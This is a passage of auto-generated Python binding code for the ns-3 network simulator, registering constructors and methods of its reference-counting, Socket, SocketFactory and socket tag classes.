def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::SimpleRefCount(ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::SimpleRefCount(ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::SimpleRefCount(ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::SimpleRefCount(ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbAddressBlock_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbAddressBlock__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter< ns3::PbbAddressBlock > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbMessage_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbMessage__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter< ns3::PbbMessage > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbPacket_Ns3Header_Ns3DefaultDeleter__lt__ns3PbbPacket__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter< ns3::PbbPacket > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3PbbTlv_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbTlv__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >::SimpleRefCount(ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter< ns3::PbbTlv > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Socket_methods(root_module, cls):
## socket.h (module 'network'): ns3::Socket::Socket(ns3::Socket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Socket const &', 'arg0')])
## socket.h (module 'network'): ns3::Socket::Socket() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): int ns3::Socket::Bind(ns3::Address const & address) [member function]
cls.add_method('Bind',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Bind() [member function]
cls.add_method('Bind',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Bind6() [member function]
cls.add_method('Bind6',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice) [member function]
cls.add_method('BindToNetDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'netdevice')],
is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Close() [member function]
cls.add_method('Close',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Connect(ns3::Address const & address) [member function]
cls.add_method('Connect',
'int',
[param('ns3::Address const &', 'address')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): static ns3::Ptr<ns3::Socket> ns3::Socket::CreateSocket(ns3::Ptr<ns3::Node> node, ns3::TypeId tid) [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')],
is_static=True)
## socket.h (module 'network'): bool ns3::Socket::GetAllowBroadcast() const [member function]
cls.add_method('GetAllowBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Socket::GetBoundNetDevice() [member function]
cls.add_method('GetBoundNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[])
## socket.h (module 'network'): ns3::Socket::SocketErrno ns3::Socket::GetErrno() const [member function]
cls.add_method('GetErrno',
'ns3::Socket::SocketErrno',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Socket::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetRxAvailable() const [member function]
cls.add_method('GetRxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::GetSockName(ns3::Address & address) const [member function]
cls.add_method('GetSockName',
'int',
[param('ns3::Address &', 'address')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Socket::SocketType ns3::Socket::GetSocketType() const [member function]
cls.add_method('GetSocketType',
'ns3::Socket::SocketType',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetTxAvailable() const [member function]
cls.add_method('GetTxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::Socket::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): bool ns3::Socket::IsRecvPktInfo() const [member function]
cls.add_method('IsRecvPktInfo',
'bool',
[],
is_const=True)
## socket.h (module 'network'): int ns3::Socket::Listen() [member function]
cls.add_method('Listen',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv(uint32_t maxSize, uint32_t flags) [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv() [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[])
## socket.h (module 'network'): int ns3::Socket::Recv(uint8_t * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Recv',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::RecvFrom(uint8_t * buf, uint32_t size, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p')])
## socket.h (module 'network'): int ns3::Socket::Send(uint8_t const * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): int ns3::Socket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
cls.add_method('SendTo',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::SendTo(uint8_t const * buf, uint32_t size, uint32_t flags, ns3::Address const & address) [member function]
cls.add_method('SendTo',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')])
## socket.h (module 'network'): void ns3::Socket::SetAcceptCallback(ns3::Callback<bool, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionRequest, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> newConnectionCreated) [member function]
cls.add_method('SetAcceptCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')])
## socket.h (module 'network'): bool ns3::Socket::SetAllowBroadcast(bool allowBroadcast) [member function]
cls.add_method('SetAllowBroadcast',
'bool',
[param('bool', 'allowBroadcast')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::SetCloseCallbacks(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> normalClose, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> errorClose) [member function]
cls.add_method('SetCloseCallbacks',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')])
## socket.h (module 'network'): void ns3::Socket::SetConnectCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionSucceeded, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionFailed) [member function]
cls.add_method('SetConnectCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')])
## socket.h (module 'network'): void ns3::Socket::SetDataSentCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> dataSent) [member function]
cls.add_method('SetDataSentCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')])
## socket.h (module 'network'): void ns3::Socket::SetRecvCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> arg0) [member function]
cls.add_method('SetRecvCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')])
## socket.h (module 'network'): void ns3::Socket::SetRecvPktInfo(bool flag) [member function]
cls.add_method('SetRecvPktInfo',
'void',
[param('bool', 'flag')])
## socket.h (module 'network'): void ns3::Socket::SetSendCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> sendCb) [member function]
cls.add_method('SetSendCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')])
## socket.h (module 'network'): int ns3::Socket::ShutdownRecv() [member function]
cls.add_method('ShutdownRecv',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::ShutdownSend() [member function]
cls.add_method('ShutdownSend',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionFailed() [member function]
cls.add_method('NotifyConnectionFailed',
'void',
[],
visibility='protected')
## socket.h (module 'network'): bool ns3::Socket::NotifyConnectionRequest(ns3::Address const & from) [member function]
cls.add_method('NotifyConnectionRequest',
'bool',
[param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionSucceeded() [member function]
cls.add_method('NotifyConnectionSucceeded',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataRecv() [member function]
cls.add_method('NotifyDataRecv',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataSent(uint32_t size) [member function]
cls.add_method('NotifyDataSent',
'void',
[param('uint32_t', 'size')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyErrorClose() [member function]
cls.add_method('NotifyErrorClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNewConnectionCreated(ns3::Ptr<ns3::Socket> socket, ns3::Address const & from) [member function]
cls.add_method('NotifyNewConnectionCreated',
'void',
[param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNormalClose() [member function]
cls.add_method('NotifyNormalClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifySend(uint32_t spaceAvailable) [member function]
cls.add_method('NotifySend',
'void',
[param('uint32_t', 'spaceAvailable')],
visibility='protected')
return
def register_Ns3SocketAddressTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag(ns3::SocketAddressTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketAddressTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketAddressTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::Address ns3::SocketAddressTag::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketAddressTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketAddressTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketAddressTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::SetAddress(ns3::Address addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'addr')])
return
def register_Ns3SocketFactory_methods(root_module, cls):
## socket-factory.h (module 'network'): ns3::SocketFactory::SocketFactory(ns3::SocketFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketFactory const &', 'arg0')])
## socket-factory.h (module 'network'): ns3::SocketFactory::SocketFactory() [constructor]
cls.add_constructor([])
## socket-factory.h (module 'network'): ns3::Ptr<ns3::Socket> ns3::SocketFactory::CreateSocket() [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[],
is_pure_virtual=True, is_virtual=True)
## socket-factory.h (module 'network'): static ns3::TypeId ns3::SocketFactory::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3SocketIpTtlTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag(ns3::SocketIpTtlTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTtlTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketIpTtlTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::SocketIpTtlTag::GetTtl() const [member function]
cls.add_method('GetTtl',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTtlTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::SetTtl(uint8_t ttl) [member function]
cls.add_method('SetTtl',
'void',
[param('uint8_t', 'ttl')])
return
def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag(ns3::SocketSetDontFragmentTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Disable() [member function]
cls.add_method('Disable',
'void',
[])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Enable() [member function]
cls.add_method('Enable',
'void',
[])
## socket.h (module 'network'): ns3::TypeId ns3::SocketSetDontFragmentTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketSetDontFragmentTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketSetDontFragmentTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): bool ns3::SocketSetDontFragmentTag::IsEnabled() const [member function]
cls.add_method('IsEnabled',
'bool',
[],
is_const=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
return
def register_Ns3Time_methods(root_module, cls):
